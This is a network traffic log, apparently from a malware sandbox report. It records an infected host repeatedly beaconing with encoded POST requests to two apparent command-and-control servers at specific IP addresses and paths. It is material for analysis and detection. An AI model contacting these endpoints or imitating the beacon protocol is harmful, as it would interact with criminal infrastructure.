                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:43.045520067 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1249        192.168.2.5  51103        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:43.036031008 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:43.289499044 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1250        192.168.2.5  51104        193.233.132.56   80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:35:43.298332930 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.551084042 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1251 | 192.168.2.5 | 51105 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.650918007 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.895411015 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1252 | 192.168.2.5 | 51106 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:43.903001070 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.154500961 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1253 | 192.168.2.5 | 51107 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.151081085 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.402163982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1254 | 192.168.2.5 | 51108 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.409887075 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.665391922 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1255 | 192.168.2.5 | 51109 | 193.233.132.167 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:44.756921053 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.001890898 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:44 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                      1256 | 192.168.2.5 | 51110 | 193.233.132.56 | 80
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.011492968 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:45.260732889 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1257 | 192.168.2.5 | 51111 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:45.250804901 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:45.499672890 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1258 | 192.168.2.5 | 51112 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:45.512886047 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:45.764080048 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1259 | 192.168.2.5 | 51113 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:45.847655058 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:46.091202974 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1260 | 192.168.2.5 | 51114 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:46.107013941 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:46.355524063 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1261 | 192.168.2.5 | 51115 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:46.345159054 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:46.596771002 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1262 | 192.168.2.5 | 51116 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:46.609648943 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:46.869631052 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1263 | 192.168.2.5 | 51117 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:46.944057941 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:47.187817097 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1264 | 192.168.2.5 | 51118 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:47.211831093 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:47.458745956 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1265 | 192.168.2.5 | 51119 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:47.437227011 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:47.685126066 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1266 | 192.168.2.5 | 51120 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:47.715745926 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:47.966459036 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1267 | 192.168.2.5 | 51121 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:48.036484957 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:48.279100895 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1268 | 192.168.2.5 | 51122 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:48.311465979 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
